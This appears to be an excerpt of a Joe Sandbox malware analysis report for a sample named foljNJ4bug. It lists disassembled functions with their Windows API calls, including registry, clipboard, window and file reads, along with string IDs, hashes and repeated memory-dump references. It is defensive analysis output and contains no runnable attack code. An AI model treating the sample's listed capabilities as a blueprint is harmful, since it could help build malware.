                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1582027408-0
                                                                                                                                              • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                                                                                              • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                                                                                              • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                                                                                              • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                                                                                              APIs
                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseConnectCreateRegistry
                                                                                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                              • API String ID: 3217815495-966354055
                                                                                                                                              • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                                                                                              • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                                                                                              • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                                                                                              • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                                                                                              APIs
                                                                                                                                              • GetCursorPos.USER32(?), ref: 004566AE
                                                                                                                                              • GetDesktopWindow.USER32 ref: 004566C3
                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                                                                                              • DestroyWindow.USER32(?), ref: 00456746
                                                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                                                                                              • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                                                                                              • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                                                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                                                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                                                                                              • IsWindowVisible.USER32(?), ref: 0045682C
                                                                                                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                                                                                              • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00456873
                                                                                                                                              • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                                                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                                                                                              • CopyRect.USER32(?,?), ref: 004568BE
                                                                                                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                                              • String ID: ($,$tooltips_class32
                                                                                                                                              • API String ID: 225202481-3320066284
                                                                                                                                              • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                                              • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                                                                                              • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                                              • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                                                                                              APIs
                                                                                                                                              • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                                              • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                                              • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                                              • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                                              • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 15083398-0
                                                                                                                                              • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                                              • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                                                                                              • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                                              • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00471D05
                                                                                                                                              • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                                                                                              • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                                                                                              • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                                                                                              • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                                                                                              • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                                                                                              • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                                                                                              • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                                                                                              • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                                                                                              • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                                                                                              • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                                                              • String ID: @$AutoIt v3 GUI
                                                                                                                                              • API String ID: 867697134-3359773793
                                                                                                                                              • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                                                                              • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                                                                                              • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                                                                              • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                              • API String ID: 1503153545-1459072770
                                                                                                                                              • Opcode ID: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                                                                                                              • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                                                                                              • Opcode Fuzzy Hash: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                                                                                                              • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __wcsicoll$__wcsnicmp
                                                                                                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                                                                                              • API String ID: 790654849-32604322
                                                                                                                                              • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                                                              • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                                                                                              • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                                                              • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                                                                                              • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                                                                                              • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                                                                                              • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                                                                                                              • _fseek.LIBCMT ref: 00452B3B
                                                                                                                                              • __wsplitpath.LIBCMT ref: 00452B9B
                                                                                                                                              • _wcscpy.LIBCMT ref: 00452BB0
                                                                                                                                              • _wcscat.LIBCMT ref: 00452BC5
                                                                                                                                              • __wsplitpath.LIBCMT ref: 00452BEF
                                                                                                                                              • _wcscat.LIBCMT ref: 00452C07
                                                                                                                                              • _wcscat.LIBCMT ref: 00452C1C
                                                                                                                                              • __fread_nolock.LIBCMT ref: 00452C53
                                                                                                                                              • __fread_nolock.LIBCMT ref: 00452C64
                                                                                                                                              • __fread_nolock.LIBCMT ref: 00452C83
                                                                                                                                              • __fread_nolock.LIBCMT ref: 00452C94
                                                                                                                                              • __fread_nolock.LIBCMT ref: 00452CB5
                                                                                                                                              • __fread_nolock.LIBCMT ref: 00452CC6
                                                                                                                                              • __fread_nolock.LIBCMT ref: 00452CD7
                                                                                                                                              • __fread_nolock.LIBCMT ref: 00452CE8
                                                                                                                                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                                                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                                                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                                                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                                                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                                                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                                                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                                                              • __fread_nolock.LIBCMT ref: 00452D78
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2054058615-0
                                                                                                                                              • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                                                                                              • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                                                                                              • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                                                                                              • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                                                                                                              APIs
                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 2353593579-4108050209
                                                                                                                                              • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                                              • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                                                                                              • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                                              • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                                                                                              APIs
                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                                                                                              • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                                                                                              • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                                                                                              • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                                                                                              • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                                                                                              • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                                                                                              • GetSysColor.USER32(00000008), ref: 0044A265
                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                                                                                              • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1744303182-0
                                                                                                                                              • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                                              • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                                                                                              • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                                              • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                                                                                              • __mtterm.LIBCMT ref: 00417C34
                                                                                                                                                • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                                                                                                • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                                                                                                • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                                                                                                • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                                                                                              • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                                                                                              • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                                                                                              • __init_pointers.LIBCMT ref: 00417CE6
                                                                                                                                              • __calloc_crt.LIBCMT ref: 00417D54
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
